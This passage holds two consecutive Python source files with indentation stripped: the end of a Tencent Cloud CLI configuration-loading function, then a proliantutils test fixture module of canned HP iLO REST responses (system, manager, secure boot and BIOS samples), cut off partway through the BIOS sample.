configure_path = os.path.join(os.path.expanduser("~"), ".tccli")
is_conf_exist, conf_path = Utils.file_existed(configure_path, g_param["profile"] + ".configure")
is_cred_exist, cred_path = Utils.file_existed(configure_path, g_param["profile"] + ".credential")
conf = {}
cred = {}
if is_conf_exist:
conf = Utils.load_json_msg(conf_path)
if is_cred_exist:
cred = Utils.load_json_msg(cred_path)
if not (isinstance(conf, dict) and isinstance(cred, dict)):
raise ConfigurationError(
"file: %s or %s is not json format"
% (g_param["profile"] + ".configure", g_param["profile"] + ".credential"))
if OptionsDefine.Token not in cred:
cred[OptionsDefine.Token] = None
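# When no explicit --profile was given, credentials, region, and role
# ARN/session name may be taken from environment variables, overriding the
# values loaded from the default profile files.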
if not is_exist_profile:
if os.environ.get(OptionsDefine.ENV_SECRET_ID) and os.environ.get(OptionsDefine.ENV_SECRET_KEY):
cred[OptionsDefine.SecretId] = os.environ.get(OptionsDefine.ENV_SECRET_ID)
cred[OptionsDefine.SecretKey] = os.environ.get(OptionsDefine.ENV_SECRET_KEY)
cred[OptionsDefine.Token] = os.environ.get(OptionsDefine.ENV_TOKEN)
if os.environ.get(OptionsDefine.ENV_REGION):
conf[OptionsDefine.Region] = os.environ.get(OptionsDefine.ENV_REGION)
if os.environ.get(OptionsDefine.ENV_ROLE_ARN) and os.environ.get(OptionsDefine.ENV_ROLE_SESSION_NAME):
cred[OptionsDefine.RoleArn] = os.environ.get(OptionsDefine.ENV_ROLE_ARN)
cred[OptionsDefine.RoleSessionName] = os.environ.get(OptionsDefine.ENV_ROLE_SESSION_NAME)
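# Merge precedence for each global parameter: an explicit command-line value
# wins; otherwise fall back to the credential/configure files. Missing
# SecretId/SecretKey are only tolerated when a CVM role is used.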
for param in g_param.keys():
if g_param[param] is None:
if param in [OptionsDefine.SecretKey, OptionsDefine.SecretId, OptionsDefine.Token]:
if param in cred:
g_param[param] = cred[param]
elif not g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
raise ConfigurationError("%s is invalid" % param)
elif param in [OptionsDefine.Region, OptionsDefine.Output]:
if param in conf:
g_param[param] = conf[param]
else:
raise ConfigurationError("%s is invalid" % param)
elif param.replace('_', '-') in [OptionsDefine.RoleArn, OptionsDefine.RoleSessionName]:
if param.replace('_', '-') in cred:
g_param[param] = cred[param.replace('_', '-')]
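# Resolve the API version and endpoint: --service-version from the command
# line takes precedence, otherwise the "domain" section of the configure file
# is used.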
try:
if g_param[OptionsDefine.ServiceVersion]:
g_param[OptionsDefine.Version] = "v" + g_param[OptionsDefine.ServiceVersion].replace('-', '')
else:
version = conf["domain"][OptionsDefine.Version]
g_param[OptionsDefine.Version] = "v" + version.replace('-', '')
if g_param[OptionsDefine.Endpoint] is None:
g_param[OptionsDefine.Endpoint] = conf["domain"][OptionsDefine.Endpoint]
except Exception as err:
raise ConfigurationError("config file:%s error, %s" % (conf_path, str(err)))
if g_param[OptionsDefine.Version] not in AVAILABLE_VERSION_LIST:
raise Exception("available versions: %s" % " ".join(AVAILABLE_VERSION_LIST))
if g_param[OptionsDefine.Waiter]:
param = eval(g_param[OptionsDefine.Waiter])
if 'expr' not in param:
raise Exception('`expr` in `--waiter` must be defined')
if 'to' not in param:
raise Exception('`to` in `--waiter` must be defined')
if 'timeout' not in param:
if 'waiter' in conf and 'timeout' in conf['waiter']:
param['timeout'] = conf['waiter']['timeout']
else:
param['timeout'] = 180
if 'interval' not in param:
if 'waiter' in conf and 'interval' in conf['waiter']:
param['interval'] = conf['waiter']['interval']
else:
param['interval'] = 5
param['interval'] = min(param['interval'], param['timeout'])
g_param['OptionsDefine.WaiterInfo'] = param
# Values read from the configuration file are unicode under Python 2 (json.load returns unicode strings), so encode them back to utf-8 here.
if six.PY2:
for key, value in g_param.items():
if isinstance(value, six.text_type):
g_param[key] = value.encode('utf-8')
return g_param
# proliantutils/tests/ilo/ris_sample_outputs.py (repo: anta-nok/proliantutils, license: Apache-2.0)
# Copyright 2015 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# Flake doesn't allow files without anything. Remove on first commit.
MODULE = "RIS"
HTTP_BOOT_URL = {
"UefiShellStartupUrl": "http://10.10.1.30:8081/startup.nsh"
}
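# The constants below are canned iLO REST responses, apparently used as test
# fixtures by the RIS tests. This first one models a full ComputerSystem
# resource (boot settings, Oem/Hp extensions, power state, and related links);
# the two *_WITH_ISCSI variants that follow carry only the Boot section.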
RESPONSE_BODY_FOR_REST_OP = """
{
"AssetTag": "",
"AvailableActions": [
{
"Action": "Reset",
"Capabilities": [
{
"AllowableValues": [
"On",
"ForceOff",
"ForceRestart",
"Nmi",
"PushPowerButton"
],
"PropertyName": "ResetType"
}
]
}
],
"Bios": {
"Current": {
"VersionString": "I36 v1.40 (01/28/2015)"
}
},
"Boot": {
"BootSourceOverrideEnabled": "Disabled",
"BootSourceOverrideSupported": [
"None",
"Cd",
"Hdd",
"Usb",
"Utilities",
"Diags",
"BiosSetup",
"Pxe",
"UefiShell",
"UefiTarget"
],
"BootSourceOverrideTarget": "None",
"UefiTargetBootSourceOverride": "None",
"UefiTargetBootSourceOverrideSupported": [
"HD.Emb.1.2",
"Generic.USB.1.1",
"NIC.FlexLOM.1.1.IPv4",
"NIC.FlexLOM.1.1.IPv6",
"CD.Virtual.2.1"
]
},
"Description": "Computer System View",
"HostCorrelation": {
"HostMACAddress": [
"6c:c2:17:39:fe:80",
"6c:c2:17:39:fe:88"
],
"HostName": "",
"IPAddress": [
"",
""
]
},
"IndicatorLED": "Off",
"Manufacturer": "HP",
"Memory": {
"TotalSystemMemoryGB": 16
},
"Model": "ProLiant BL460c Gen9",
"Name": "Computer System",
"Oem": {
"Hp": {
"AvailableActions": [
{
"Action": "PowerButton",
"Capabilities": [
{
"AllowableValues": [
"Press",
"PressAndHold"
],
"PropertyName": "PushType"
},
{
"AllowableValues": [
"/Oem/Hp"
],
"PropertyName": "Target"
}
]
},
{
"Action": "SystemReset",
"Capabilities": [
{
"AllowableValues": [
"ColdBoot"
],
"PropertyName": "ResetType"
},
{
"AllowableValues": [
"/Oem/Hp"
],
"PropertyName": "Target"
}
]
}
],
"Battery": [],
"Bios": {
"Backup": {
"Date": "v1.40 (01/28/2015)",
"Family": "I36",
"VersionString": "I36 v1.40 (01/28/2015)"
},
"Current": {
"Date": "01/28/2015",
"Family": "I36",
"VersionString": "I36 v1.40 (01/28/2015)"
},
"UefiClass": 2
},
"DeviceDiscoveryComplete": {
"AMSDeviceDiscovery": "NoAMS",
"SmartArrayDiscovery": "Initial",
"vAuxDeviceDiscovery": "DataIncomplete",
"vMainDeviceDiscovery": "ServerOff"
},
"PostState": "PowerOff",
"PowerAllocationLimit": 500,
"PowerAutoOn": "PowerOn",
"PowerOnDelay": "Minimum",
"PowerRegulatorMode": "Dynamic",
"PowerRegulatorModesSupported": [
"OSControl",
"Dynamic",
"Max",
"Min"
],
"ServerSignature": 0,
"Type": "HpComputerSystemExt.0.10.1",
"VirtualProfile": "Inactive",
"VirtualUUID": null,
"links": {
"BIOS": {
"href": "/rest/v1/systems/1/bios"
},
"MEMORY": {
"href": "/rest/v1/Systems/1/Memory"
},
"PCIDevices": {
"href": "/rest/v1/Systems/1/PCIDevices"
},
"PCISlots": {
"href": "/rest/v1/Systems/1/PCISlots"
},
"SecureBoot": {
"href": "/rest/v1/Systems/1/SecureBoot"
}
}
}
},
"Power": "Off",
"Processors": {
"Count": 1,
"ProcessorFamily": "Intel(R) Xeon(R) CPU E5-2609 v3 @ 1.90GHz",
"Status": {
"HealthRollUp": "OK"
}
},
"SKU": "727021-B21",
"SerialNumber": "SGH449WNL3",
"Status": {
"Health": "OK",
"State": "Disabled"
},
"SystemType": "Physical",
"Type": "ComputerSystem.0.9.6",
"UUID": "30373237-3132-4753-4834-3439574E4C33",
"links": {
"Chassis": [
{
"href": "/rest/v1/Chassis/1"
}
],
"Logs": {
"href": "/rest/v1/Systems/1/Logs"
},
"ManagedBy": [
{
"href": "/rest/v1/Managers/1"
}
],
"self": {
"href": "/rest/v1/Systems/1"
}
}
}
"""
RESPONSE_BODY_FOR_REST_OP_WITH_ISCSI = """
{
"Boot": {
"BootSourceOverrideEnabled": "Disabled",
"BootSourceOverrideSupported": [
"None",
"Cd",
"Hdd",
"Usb",
"Utilities",
"Diags",
"BiosSetup",
"Pxe",
"UefiShell",
"UefiTarget"
],
"BootSourceOverrideTarget": "None",
"UefiTargetBootSourceOverride": "None",
"UefiTargetBootSourceOverrideSupported": [
"HD.Emb.1.2",
"Generic.USB.1.1",
"NIC.FlexLOM.1.1.IPv4",
"NIC.FlexLOM.1.1.IPv6",
"NIC.LOM.1.1.iSCSI",
"CD.Virtual.2.1"
]
}
}
"""
RESPONSE_BODY_FOR_REST_OP_WITH_ISCSI_AND_NONE = """
{
"Boot": {
"BootSourceOverrideEnabled": "Disabled",
"BootSourceOverrideSupported": [
"None",
"Cd",
"Hdd",
"Usb",
"Utilities",
"Diags",
"BiosSetup",
"Pxe",
"UefiShell",
"UefiTarget"
],
"BootSourceOverrideTarget": "None",
"UefiTargetBootSourceOverride": "None",
"UefiTargetBootSourceOverrideSupported": [
"HD.Emb.1.2",
null,
"HD.Emb.2.1",
"HD.Emb.1.2",
"NIC.FlexLOM.1.1.IPv4",
"NIC.FlexLOM.1.1.IPv6",
"NIC.LOM.1.1.iSCSI",
"CD.Virtual.2.1"
]
}
}
"""
HEADERS_FOR_REST_OP = [('content-length', '2729'),
('server', 'HP-iLO-Server/1.30'),
('etag', 'W/"B61EB245"'),
('allow', 'GET, HEAD, POST, PATCH'),
('cache-control', 'no-cache'),
('date', 'Thu, 19 Mar 2015 06:55:59 GMT'),
('x_hp-chrp-service-version', '1.0.3'),
('content-type', 'application/json')]
COLLECTIONS_SAMPLE = """
{
"Description": "iLO User Accounts",
"links": {
"Member": [
{
"href": "/rest/v1/AccountService/Accounts/1"
}
],
"self": {
"href": "/rest/v1/AccountService/Accounts"
}
},
"Items": [
{
"UserName": "Administrator",
"Description": "iLO User Account",
"links": {
"self": {
"href": "/rest/v1/AccountService/Accounts/1"
}
},
"Oem": {
"Hp": {
"Privileges": {
"RemoteConsolePriv": "true",
"iLOConfigPriv": "true",
"VirtualMediaPriv": "true",
"UserConfigPriv": "true",
"VirtualPowerAndResetPriv": "true",
"LoginPriv": "true"
},
"LoginName": "Administrator",
"Type": "HpiLOAccount.0.9.7"
}
},
"Password": null,
"Type": "ManagerAccount.0.9.7",
"Name": "User Account"
}
],
"MemberType": "ManagerAccount.0",
"Total": 1,
"Type": "Collection.0.9.5",
"Name": "Accounts"
}
"""
GET_HEADERS = {
'content-length': '114',
'etag': 'W/"715B59E6"',
'allow': 'GET, HEAD, PATCH, POST',
'cache-control': 'no-cache',
'date': 'Mon, 23 Mar 2015 08:49:12 GMT',
'server': 'HP-iLO-Server/1.30',
'content-type': 'application/json',
'x_hp-chrp-service-version': '1.0.3'
}
REST_GET_SMART_STORAGE = """
{
"Model": "ProLiant BL460c Gen9",
"Name": "Computer System",
"Oem": {
"Hp": {
"links":
{
"SmartStorage":
{
"href": "/rest/v1/Systems/1/SmartStorage"
}
}
}
}
}
"""
REST_GET_SECURE_BOOT = {
"Name": "SecureBoot",
"ResetAllKeys": True,
"ResetToDefaultKeys": True,
"SecureBootCurrentState": False,
"SecureBootEnable": True,
"Type": "HpSecureBoot.0.9.5",
"links":
{
"self":
{
"href": "/rest/v1/Systems/1/SecureBoot"
}
}
}
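# Canned ExtendedError payloads: a fake failure message and a success
# response, presumably mimicking what iLO returns for REST write operations.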
REST_FAILURE_OUTPUT = {
'Type': 'ExtendedError.1.0.0',
'Messages': [{'MessageID': 'Base.0.0.FakeFailureMessage'}],
'Name': 'Extended Error Information'
}
REST_POST_RESPONSE = {
'Type': 'ExtendedError.0.9.6',
'Messages': [{'MessageID': 'Base.0.0.Success'}],
'Name': 'Extended Error Information'
}
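# Manager (iLO) resource samples. The variants below differ mainly in the
# reported Oem/Hp firmware version: v2.04 in GET_MANAGER_DETAILS, v2.30 in the
# *_EQ_SUGGESTED variant, v2.54 in *_GT_SUGGESTED, and a *_NO_FIRMWARE variant
# whose firmware entry lacks the MajorVersion field (apparently relative to a
# firmware version suggested by the tests).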
GET_MANAGER_DETAILS = """
{
"AvailableActions":
[
{
"Action": "Reset"
}
],
"CommandShell":
{
"ConnectTypesSupported":
[
"SSH",
"Oem"
],
"Enabled": true,
"MaxConcurrentSessions": 9
},
"Description": "Manager View",
"Firmware":
{
"Current":
{
"VersionString": "iLO 4 v2.20"
}
},
"GraphicalConsole":
{
"ConnectTypesSupported":
[
"KVMIP"
],
"Enabled": true,
"MaxConcurrentSessions": 10
},
"ManagerType": "BMC",
"Model": "iLO 4",
"Name": "Manager",
"Oem":
{
"Hp":
{
"AvailableActions":
[
{
"Action": "ResetRestApiState",
"Capabilities":
[
{
"AllowableValues":
[
"/Oem/Hp"
],
"PropertyName": "Target"
}
]
}
],
"FederationConfig":
{
"IPv6MulticastScope": "Site",
"MulticastAnnouncementInterval": 600,
"MulticastDiscovery": "Enabled",
"MulticastTimeToLive": 5,
"iLOFederationManagement": "Enabled"
},
"Firmware":
{
"Current":
{
"Date": "Feb 09 2015",
"DebugBuild": false,
"MajorVersion": 2,
"MinorVersion": 4,
"Time": "",
"VersionString": "iLO 4 v2.04"
}
},
"License":
{
"LicenseKey": "32Q6W-PQWTB-H7XYL-39968-RR53R",
"LicenseString": "iLO 4 Advanced",
"LicenseType": "Perpetual"
},
"RequiredLoginForiLORBSU": false,
"SerialCLISpeed": 9600,
"SerialCLIStatus": "EnabledAuthReq",
"Type": "HpiLO.0.13.0",
"VSPLogDownloadEnabled": false,
"iLOSelfTestResults":
[
{
"Notes": "",
"SelfTestName": "NVRAMData",
"Status": "OK"
},
{
"Notes": "Controller firmware revision 2.09.00 ",
"SelfTestName": "EmbeddedFlash/SDCard",
"Status": "OK"
},
{
"Notes": "",
"SelfTestName": "EEPROM",
"Status": "OK"
},
{
"Notes": "",
"SelfTestName": "HostRom",
"Status": "OK"
},
{
"Notes": "",
"SelfTestName": "SupportedHost",
"Status": "OK"
},
{
"Notes": "ProLiant BL460c Gen9 System Programmable \
Logic Device version 0x13",
"SelfTestName": "CPLDPAL0",
"Status": "Informational"
},
{
"Notes": "ProLiant BL460c Gen9 SAS Programmable \
Logic Device version 0x01",
"SelfTestName": "CPLDPAL1",
"Status": "Informational"
}
],
"links":
{
"ActiveHealthSystem":
{
"href": "/rest/v1/Managers/1/ActiveHealthSystem"
},
"DateTimeService":
{
"href": "/rest/v1/Managers/1/DateTime"
},
"EmbeddedMediaService":
{
"href": "/rest/v1/Managers/1/EmbeddedMedia"
},
"FederationDispatch":
{
"extref": "/dispatch"
},
"FederationGroups":
{
"href": "/rest/v1/Managers/1/FederationGroups"
},
"FederationPeers":
{
"href": "/rest/v1/Managers/1/FederationPeers"
},
"LicenseService":
{
"href": "/rest/v1/Managers/1/LicenseService"
},
"UpdateService":
{
"href": "/rest/v1/Managers/1/UpdateService"
},
"VSPLogLocation":
{
"extref": "/sol.log.gz"
}
}
}
},
"SerialConsole":
{
"ConnectTypesSupported":
[
"SSH",
"IPMI",
"Oem"
],
"Enabled": true,
"MaxConcurrentSessions": 13
},
"Status":
{
"State": "Enabled"
},
"Type": "Manager.0.10.0",
"UUID": "83590768-e977-575a-927a-b3de8f692d4f",
"links":
{
"EthernetNICs":
{
"href": "/rest/v1/Managers/1/NICs"
},
"Logs":
{
"href": "/rest/v1/Managers/1/Logs"
},
"ManagerForServers":
[
{
"href": "/rest/v1/Systems/1"
}
],
"NetworkService":
{
"href": "/rest/v1/Managers/1/NetworkService"
},
"VirtualMedia":
{
"href": "/rest/v1/Managers/1/VirtualMedia"
},
"self":
{
"href": "/rest/v1/Managers/1"
}
}
}
"""
GET_MANAGER_DETAILS_EQ_SUGGESTED = """
{
"AvailableActions":
[
{
"Action": "Reset"
}
],
"CommandShell":
{
"ConnectTypesSupported":
[
"SSH",
"Oem"
],
"Enabled": true,
"MaxConcurrentSessions": 9
},
"Description": "Manager View",
"Firmware":
{
"Current":
{
"VersionString": "iLO 4 v2.20"
}
},
"GraphicalConsole":
{
"ConnectTypesSupported":
[
"KVMIP"
],
"Enabled": true,
"MaxConcurrentSessions": 10
},
"ManagerType": "BMC",
"Model": "iLO 4",
"Name": "Manager",
"Oem":
{
"Hp":
{
"AvailableActions":
[
{
"Action": "ResetRestApiState",
"Capabilities":
[
{
"AllowableValues":
[
"/Oem/Hp"
],
"PropertyName": "Target"
}
]
}
],
"FederationConfig":
{
"IPv6MulticastScope": "Site",
"MulticastAnnouncementInterval": 600,
"MulticastDiscovery": "Enabled",
"MulticastTimeToLive": 5,
"iLOFederationManagement": "Enabled"
},
"Firmware":
{
"Current":
{
"Date": "Feb 09 2015",
"DebugBuild": false,
"MajorVersion": 2,
"MinorVersion": 4,
"Time": "",
"VersionString": "iLO 4 v2.30"
}
},
"License":
{
"LicenseKey": "32Q6W-PQWTB-H7XYL-39968-RR53R",
"LicenseString": "iLO 4 Advanced",
"LicenseType": "Perpetual"
},
"RequiredLoginForiLORBSU": false,
"SerialCLISpeed": 9600,
"SerialCLIStatus": "EnabledAuthReq",
"Type": "HpiLO.0.13.0",
"VSPLogDownloadEnabled": false,
"iLOSelfTestResults":
[
{
"Notes": "",
"SelfTestName": "NVRAMData",
"Status": "OK"
},
{
"Notes": "Controller firmware revision 2.09.00 ",
"SelfTestName": "EmbeddedFlash/SDCard",
"Status": "OK"
},
{
"Notes": "",
"SelfTestName": "EEPROM",
"Status": "OK"
},
{
"Notes": "",
"SelfTestName": "HostRom",
"Status": "OK"
},
{
"Notes": "",
"SelfTestName": "SupportedHost",
"Status": "OK"
},
{
"Notes": "ProLiant BL460c Gen9 System Programmable \
Logic Device version 0x13",
"SelfTestName": "CPLDPAL0",
"Status": "Informational"
},
{
"Notes": "ProLiant BL460c Gen9 SAS Programmable \
Logic Device version 0x01",
"SelfTestName": "CPLDPAL1",
"Status": "Informational"
}
],
"links":
{
"ActiveHealthSystem":
{
"href": "/rest/v1/Managers/1/ActiveHealthSystem"
},
"DateTimeService":
{
"href": "/rest/v1/Managers/1/DateTime"
},
"EmbeddedMediaService":
{
"href": "/rest/v1/Managers/1/EmbeddedMedia"
},
"FederationDispatch":
{
"extref": "/dispatch"
},
"FederationGroups":
{
"href": "/rest/v1/Managers/1/FederationGroups"
},
"FederationPeers":
{
"href": "/rest/v1/Managers/1/FederationPeers"
},
"LicenseService":
{
"href": "/rest/v1/Managers/1/LicenseService"
},
"UpdateService":
{
"href": "/rest/v1/Managers/1/UpdateService"
},
"VSPLogLocation":
{
"extref": "/sol.log.gz"
}
}
}
},
"SerialConsole":
{
"ConnectTypesSupported":
[
"SSH",
"IPMI",
"Oem"
],
"Enabled": true,
"MaxConcurrentSessions": 13
},
"Status":
{
"State": "Enabled"
},
"Type": "Manager.0.10.0",
"UUID": "83590768-e977-575a-927a-b3de8f692d4f",
"links":
{
"EthernetNICs":
{
"href": "/rest/v1/Managers/1/NICs"
},
"Logs":
{
"href": "/rest/v1/Managers/1/Logs"
},
"ManagerForServers":
[
{
"href": "/rest/v1/Systems/1"
}
],
"NetworkService":
{
"href": "/rest/v1/Managers/1/NetworkService"
},
"VirtualMedia":
{
"href": "/rest/v1/Managers/1/VirtualMedia"
},
"self":
{
"href": "/rest/v1/Managers/1"
}
}
}
"""
GET_MANAGER_DETAILS_GT_SUGGESTED = """
{
"AvailableActions":
[
{
"Action": "Reset"
}
],
"CommandShell":
{
"ConnectTypesSupported":
[
"SSH",
"Oem"
],
"Enabled": true,
"MaxConcurrentSessions": 9
},
"Description": "Manager View",
"Firmware":
{
"Current":
{
"VersionString": "iLO 4 v2.54"
}
},
"GraphicalConsole":
{
"ConnectTypesSupported":
[
"KVMIP"
],
"Enabled": true,
"MaxConcurrentSessions": 10
},
"ManagerType": "BMC",
"Model": "iLO 4",
"Name": "Manager",
"Oem":
{
"Hp":
{
"AvailableActions":
[
{
"Action": "ResetRestApiState",
"Capabilities":
[
{
"AllowableValues":
[
"/Oem/Hp"
],
"PropertyName": "Target"
}
]
}
],
"FederationConfig":
{
"IPv6MulticastScope": "Site",
"MulticastAnnouncementInterval": 600,
"MulticastDiscovery": "Enabled",
"MulticastTimeToLive": 5,
"iLOFederationManagement": "Enabled"
},
"Firmware":
{
"Current":
{
"Date": "Feb 09 2015",
"DebugBuild": false,
"MajorVersion": 2,
"MinorVersion": 54,
"Time": "",
"VersionString": "iLO 4 v2.54"
}
},
"License":
{
"LicenseKey": "32Q6W-PQWTB-H7XYL-39968-RR53R",
"LicenseString": "iLO 4 Advanced",
"LicenseType": "Perpetual"
},
"RequiredLoginForiLORBSU": false,
"SerialCLISpeed": 9600,
"SerialCLIStatus": "EnabledAuthReq",
"Type": "HpiLO.0.13.0",
"VSPLogDownloadEnabled": false,
"iLOSelfTestResults":
[
{
"Notes": "",
"SelfTestName": "NVRAMData",
"Status": "OK"
},
{
"Notes": "Controller firmware revision 2.09.00 ",
"SelfTestName": "EmbeddedFlash/SDCard",
"Status": "OK"
},
{
"Notes": "",
"SelfTestName": "EEPROM",
"Status": "OK"
},
{
"Notes": "",
"SelfTestName": "HostRom",
"Status": "OK"
},
{
"Notes": "",
"SelfTestName": "SupportedHost",
"Status": "OK"
},
{
"Notes": "ProLiant BL460c Gen9 System Programmable \
Logic Device version 0x13",
"SelfTestName": "CPLDPAL0",
"Status": "Informational"
},
{
"Notes": "ProLiant BL460c Gen9 SAS Programmable \
Logic Device version 0x01",
"SelfTestName": "CPLDPAL1",
"Status": "Informational"
}
],
"links":
{
"ActiveHealthSystem":
{
"href": "/rest/v1/Managers/1/ActiveHealthSystem"
},
"DateTimeService":
{
"href": "/rest/v1/Managers/1/DateTime"
},
"EmbeddedMediaService":
{
"href": "/rest/v1/Managers/1/EmbeddedMedia"
},
"FederationDispatch":
{
"extref": "/dispatch"
},
"FederationGroups":
{
"href": "/rest/v1/Managers/1/FederationGroups"
},
"FederationPeers":
{
"href": "/rest/v1/Managers/1/FederationPeers"
},
"LicenseService":
{
"href": "/rest/v1/Managers/1/LicenseService"
},
"UpdateService":
{
"href": "/rest/v1/Managers/1/UpdateService"
},
"VSPLogLocation":
{
"extref": "/sol.log.gz"
}
}
}
},
"SerialConsole":
{
"ConnectTypesSupported":
[
"SSH",
"IPMI",
"Oem"
],
"Enabled": true,
"MaxConcurrentSessions": 13
},
"Status":
{
"State": "Enabled"
},
"Type": "Manager.0.10.0",
"UUID": "83590768-e977-575a-927a-b3de8f692d4f",
"links":
{
"EthernetNICs":
{
"href": "/rest/v1/Managers/1/NICs"
},
"Logs":
{
"href": "/rest/v1/Managers/1/Logs"
},
"ManagerForServers":
[
{
"href": "/rest/v1/Systems/1"
}
],
"NetworkService":
{
"href": "/rest/v1/Managers/1/NetworkService"
},
"VirtualMedia":
{
"href": "/rest/v1/Managers/1/VirtualMedia"
},
"self":
{
"href": "/rest/v1/Managers/1"
}
}
}
"""
GET_MANAGER_DETAILS_NO_FIRMWARE = """
{
"AvailableActions":
[
{
"Action": "Reset"
}
],
"CommandShell":
{
"ConnectTypesSupported":
[
"SSH",
"Oem"
],
"Enabled": true,
"MaxConcurrentSessions": 9
},
"Description": "Manager View",
"Firmware":
{
"Current":
{
"VersionString": "iLO 4 v2.20"
}
},
"GraphicalConsole":
{
"ConnectTypesSupported":
[
"KVMIP"
],
"Enabled": true,
"MaxConcurrentSessions": 10
},
"ManagerType": "BMC",
"Model": "iLO 4",
"Name": "Manager",
"Oem":
{
"Hp":
{
"AvailableActions":
[
{
"Action": "ResetRestApiState",
"Capabilities":
[
{
"AllowableValues":
[
"/Oem/Hp"
],
"PropertyName": "Target"
}
]
}
],
"FederationConfig":
{
"IPv6MulticastScope": "Site",
"MulticastAnnouncementInterval": 600,
"MulticastDiscovery": "Enabled",
"MulticastTimeToLive": 5,
"iLOFederationManagement": "Enabled"
},
"Firmware":
{
"Current":
{
"Date": "Feb 09 2015",
"DebugBuild": false,
"MinorVersion": 20,
"Time": "",
"VersionString": "iLO 4 v"
}
},
"License":
{
"LicenseKey": "32Q6W-PQWTB-H7XYL-39968-RR53R",
"LicenseString": "iLO 4 Advanced",
"LicenseType": "Perpetual"
},
"RequiredLoginForiLORBSU": false,
"SerialCLISpeed": 9600,
"SerialCLIStatus": "EnabledAuthReq",
"Type": "HpiLO.0.13.0",
"VSPLogDownloadEnabled": false,
"iLOSelfTestResults":
[
{
"Notes": "",
"SelfTestName": "NVRAMData",
"Status": "OK"
},
{
"Notes": "Controller firmware revision 2.09.00 ",
"SelfTestName": "EmbeddedFlash/SDCard",
"Status": "OK"
},
{
"Notes": "",
"SelfTestName": "EEPROM",
"Status": "OK"
},
{
"Notes": "",
"SelfTestName": "HostRom",
"Status": "OK"
},
{
"Notes": "",
"SelfTestName": "SupportedHost",
"Status": "OK"
},
{
"Notes": "ProLiant BL460c Gen9 System Programmable \
Logic Device version 0x13",
"SelfTestName": "CPLDPAL0",
"Status": "Informational"
},
{
"Notes": "ProLiant BL460c Gen9 SAS Programmable \
Logic Device version 0x01",
"SelfTestName": "CPLDPAL1",
"Status": "Informational"
}
],
"links":
{
"ActiveHealthSystem":
{
"href": "/rest/v1/Managers/1/ActiveHealthSystem"
},
"DateTimeService":
{
"href": "/rest/v1/Managers/1/DateTime"
},
"EmbeddedMediaService":
{
"href": "/rest/v1/Managers/1/EmbeddedMedia"
},
"FederationDispatch":
{
"extref": "/dispatch"
},
"FederationGroups":
{
"href": "/rest/v1/Managers/1/FederationGroups"
},
"FederationPeers":
{
"href": "/rest/v1/Managers/1/FederationPeers"
},
"LicenseService":
{
"href": "/rest/v1/Managers/1/LicenseService"
},
"UpdateService":
{
"href": "/rest/v1/Managers/1/UpdateService"
},
"VSPLogLocation":
{
"extref": "/sol.log.gz"
}
}
}
},
"SerialConsole":
{
"ConnectTypesSupported":
[
"SSH",
"IPMI",
"Oem"
],
"Enabled": true,
"MaxConcurrentSessions": 13
},
"Status":
{
"State": "Enabled"
},
"Type": "Manager.0.10.0",
"UUID": "83590768-e977-575a-927a-b3de8f692d4f",
"links":
{
"EthernetNICs":
{
"href": "/rest/v1/Managers/1/NICs"
},
"Logs":
{
"href": "/rest/v1/Managers/1/Logs"
},
"ManagerForServers":
[
{
"href": "/rest/v1/Systems/1"
}
],
"NetworkService":
{
"href": "/rest/v1/Managers/1/NetworkService"
},
"VirtualMedia":
{
"href": "/rest/v1/Managers/1/VirtualMedia"
},
"self":
{
"href": "/rest/v1/Managers/1"
}
}
}
"""
GET_BIOS_SETTINGS = """
{
"AcpiRootBridgePxm": "Enabled",
"AcpiSlit": "Enabled",
"AdjSecPrefetch": "Enabled",
"AdminEmail": "",
"AdminName": "",
"AdminOtherInfo": "",
"AdminPassword": null,
"AdminPhone": "",
"AdvancedMemProtection": "AdvancedEcc",
"AsrStatus": "Enabled",
"AsrTimeoutMinutes": "10",
"AssetTagProtection": "Unlocked",
"AttributeRegistry": "HpBiosAttributeRegistryI36.1.0.40",
"BootMode": "Uefi",
"BootOrderPolicy": "RetryIndefinitely",
"ChannelInterleaving": "Enabled",
"CollabPowerControl": "Enabled",
"ConsistentDevNaming": "LomsOnly",
"CustomPostMessage": "",
"DcuIpPrefetcher": "Enabled",
"DcuStreamPrefetcher": "Enabled",
"Description": "This is the Platform/BIOS Configuration (RBSU)\
Current Settings",
"Dhcpv4": "Enabled",
"DynamicPowerCapping": "Auto",
"DynamicPowerResponse": "Fast",
"EmbNicEnable": "Enabled",
"EmbSasEnable": "Enabled",
"EmbSata1Enable": "Enabled",
"EmbSata2Enable": "Enabled",
"EmbVideoConnection": "Auto",
"EmbeddedDiagnostics": "Enabled",
"EmbeddedDiagsMode": "Auto",
"EmbeddedSata": "Ahci",
"EmbeddedSerialPort": "Com2Irq3",
"EmbeddedUefiShell": "Enabled",
"EmbeddedUserPartition": "Disabled",
"EmsConsole": "Com1Irq4",
"EnergyPerfBias": "BalancedPerf",
"EraseUserDefaults": "No",
"ExtendedAmbientTemp": "Disabled",
"ExtendedMemTest": "Disabled",
"F11BootMenu": "Enabled",
"FCScanPolicy": "AllTargets",
"FanFailPolicy": "Shutdown",
"FanInstallReq": "EnableMessaging",
"FlexLom1Enable": "Enabled",
"HwPrefetcher": "Enabled",
"IntelDmiLinkFreq": "Auto",
"IntelNicDmaChannels": "Enabled",
"IntelPerfMonitoring": "Disabled",
"IntelProcVtd": "Enabled",
"IntelQpiFreq": "Auto",
"IntelQpiLinkEn": "Auto",
"IntelQpiPowerManagement": "Enabled",
"IntelTxt": "Disabled",
"IntelligentProvisioning": "Enabled",
"InternalSDCardSlot": "Enabled",
"IoNonPostedPrefetching": "Enabled",
"Ipv4Address": "0.0.0.0",
"Ipv4Gateway": "0.0.0.0",
"Ipv4PrimaryDNS": "0.0.0.0",
"Ipv4SecondaryDNS": "0.0.0.0",
"Ipv4SubnetMask": "0.0.0.0",
"MaxMemBusFreqMHz": "Auto",
"MaxPcieSpeed": "MaxSupported",
"MemFastTraining": "Enabled",
"MinProcIdlePkgState": "C6Retention",
"MinProcIdlePower": "C6",
"MixedPowerSupplyReporting": "Enabled",
"Modified": "2015-03-13T21:50:42+00:00",
"Name": "BIOS Current Settings",
"NetworkBootRetry": "Enabled",
"NicBoot1": "NetworkBoot",
"NicBoot2": "Disabled",
